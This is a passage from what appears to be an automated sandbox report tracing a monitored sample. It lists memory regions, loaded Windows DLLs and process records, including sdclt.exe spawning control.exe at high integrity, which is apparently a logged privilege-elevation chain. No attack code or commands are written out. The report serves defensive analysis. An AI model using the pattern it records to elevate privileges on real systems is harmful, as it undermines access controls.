entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1395 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1396 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1397 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1398 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1399 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1400 start_va = 0x7ff7c9cb0000 end_va = 0x7ff7c9ddffff monitored = 0 entry_point = 0x7ff7c9d28660 region_type = mapped_file name = "sdclt.exe" filename = "\\Windows\\System32\\sdclt.exe" (normalized: "c:\\windows\\system32\\sdclt.exe") Region: id = 1401 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1403 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1404 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1405 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1406 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1407 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1408 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1409 start_va = 0x7ff857b90000 end_va = 0x7ff857c08fff monitored = 0 entry_point = 0x7ff857bafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1412 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 1413 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1414 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1415 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1416 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1417 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1418 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1419 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1420 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1421 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1422 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1433 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1434 start_va = 0x7ff84f7b0000 end_va = 0x7ff84f7f8fff monitored = 0 entry_point = 0x7ff84f7e3470 region_type = mapped_file name = "spp.dll" filename = "\\Windows\\System32\\spp.dll" (normalized: "c:\\windows\\system32\\spp.dll") Region: id = 1435 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1436 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1437 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1438 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1439 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1440 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1441 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1442 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1443 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1444 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1445 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1446 start_va = 0x7ff842640000 end_va = 0x7ff842740fff monitored = 0 entry_point = 0x7ff8426417d0 region_type = mapped_file name = "reagent.dll" filename = "\\Windows\\System32\\ReAgent.dll" (normalized: "c:\\windows\\system32\\reagent.dll") Region: id = 1447 start_va = 0x580000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1448 start_va = 0x7ff843a90000 end_va = 0x7ff843b2ffff monitored = 0 entry_point = 0x7ff843b00910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1449 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1450 start_va = 0x7ff84cf20000 end_va = 0x7ff84cf3afff monitored = 0 entry_point = 0x7ff84cf21040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1451 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1452 start_va = 0x7ff85be80000 end_va = 0x7ff85be9bfff monitored = 0 entry_point = 0x7ff85be831a0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1453 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1454 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1455 start_va = 0x7ff84f9a0000 end_va = 0x7ff84fb21fff monitored = 0 entry_point = 0x7ff84f9b82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1456 start_va = 0x7ff851850000 end_va = 0x7ff851ac3fff monitored = 0 entry_point = 0x7ff8518c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1457 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1458 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1459 start_va = 0x7ff84f390000 end_va = 0x7ff84f3d1fff monitored = 0 entry_point = 0x7ff84f393670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1460 start_va = 0x7ff84f790000 end_va = 0x7ff84f7a9fff monitored = 0 entry_point = 0x7ff84f7a1640 region_type = mapped_file name = "bcd.dll" filename = "\\Windows\\System32\\bcd.dll" (normalized: "c:\\windows\\system32\\bcd.dll") Region: id = 1461 start_va = 0x7ff842550000 end_va = 0x7ff842632fff monitored = 0 entry_point = 0x7ff842551a50 region_type = mapped_file name = "dismapi.dll" filename = "\\Windows\\System32\\DismApi.dll" (normalized: "c:\\windows\\system32\\dismapi.dll") Region: id = 1462 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1463 start_va = 0x7ff84f980000 end_va = 0x7ff84f997fff monitored = 0 entry_point = 0x7ff84f982000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1464 start_va = 0x7ff858d40000 end_va = 0x7ff858d49fff monitored = 0 entry_point = 0x7ff858d41830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1465 start_va = 0x680000 end_va = 0x807fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1466 start_va = 0x810000 end_va = 0x848fff monitored = 0 entry_point = 0x8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1467 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1468 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1469 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1470 start_va = 0x810000 end_va = 0x990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1471 start_va = 0x9a0000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1472 start_va = 0x1da0000 end_va = 0x1db8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sdclt.exe.mui" filename = "\\Windows\\System32\\en-US\\sdclt.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sdclt.exe.mui") Region: id = 1473 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1474 start_va = 0x1dc0000 end_va = 0x1dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 1475 start_va = 0x1dd0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1476 start_va = 0x1dd0000 end_va = 0x1dd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1477 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1478 start_va = 0x1de0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 1479 start_va = 0x1fa0000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1480 start_va = 0x1de0000 end_va = 0x1de0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1481 start_va = 0x1e50000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1482 start_va = 0x1df0000 end_va = 0x1df1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 1483 start_va = 0x1e60000 end_va = 0x1f3cfff monitored = 0 entry_point = 0x1ebe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1484 start_va = 0x1de0000 end_va = 0x1de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 1485 start_va = 0x1e00000 end_va = 0x1e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1486 start_va = 0x1e60000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1487 start_va = 0x1e00000 end_va = 0x1e00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 1488 start_va = 0x2190000 end_va = 0x24c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1489 start_va = 0x1ee0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 1490 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1491 start_va = 0x1fa0000 end_va = 0x207cfff monitored = 0 entry_point = 0x1ffe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1492 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1493 start_va = 0x1fa0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 1494 start_va = 0x2020000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1495 start_va = 0x20a0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1496 start_va = 0x1e10000 end_va = 0x1e10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 1497 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1498 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1499 start_va = 0x1e20000 end_va = 0x1e20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 1500 start_va = 0x1e30000 end_va = 0x1e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1501 start_va = 0x2120000 end_va = 0x2164fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1502 start_va = 0x1e40000 end_va = 0x1e43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1503 start_va = 0x24d0000 end_va = 0x255dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1504 start_va = 0x2560000 end_va = 0x295afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 1505 start_va = 0x1f60000 end_va = 0x1f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1506 start_va = 0x1f70000 end_va = 0x1f86fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 1507 start_va = 0x2170000 end_va = 0x2170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 1508 start_va = 0x7ff84d450000 end_va = 0x7ff84d607fff monitored = 0 entry_point = 0x7ff84d4be630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1509 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1510 start_va = 0x1f60000 end_va = 0x1f60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Thread: id = 31 os_tid = 0xec0 Thread: id = 34 os_tid = 0xed0 Thread: id = 35 os_tid = 0xed4 Thread: id = 36 os_tid = 0xed8 Thread: id = 37 os_tid = 0xef8 Thread: id = 38 os_tid = 0xefc Thread: id = 39 os_tid = 0xf00 Thread: id = 40 os_tid = 0xf04 Thread: id = 41 os_tid = 0xf08 Process: id = "10" image_name = "sdclt.exe" filename = "c:\\windows\\system32\\sdclt.exe" page_root = "0x5c39000" os_pid = "0xec8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xdd8" cmd_line = "\"C:\\Windows\\system32\\sdclt.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1423 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1424 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1425 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1426 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1427 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1428 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1429 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1430 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1431 start_va = 0x7ff7c9cb0000 end_va = 0x7ff7c9ddffff monitored = 0 entry_point = 0x7ff7c9d28660 region_type = mapped_file name = "sdclt.exe" filename = "\\Windows\\System32\\sdclt.exe" (normalized: "c:\\windows\\system32\\sdclt.exe") Region: id = 1432 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 33 os_tid = 0xecc Process: id = "11" image_name = "control.exe" filename = "c:\\windows\\system32\\control.exe" page_root = "0x90ab000" os_pid = "0xf2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xebc" cmd_line = "\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1511 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1512 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1513 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1514 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1515 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1516 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1517 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1518 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1519 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1520 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id 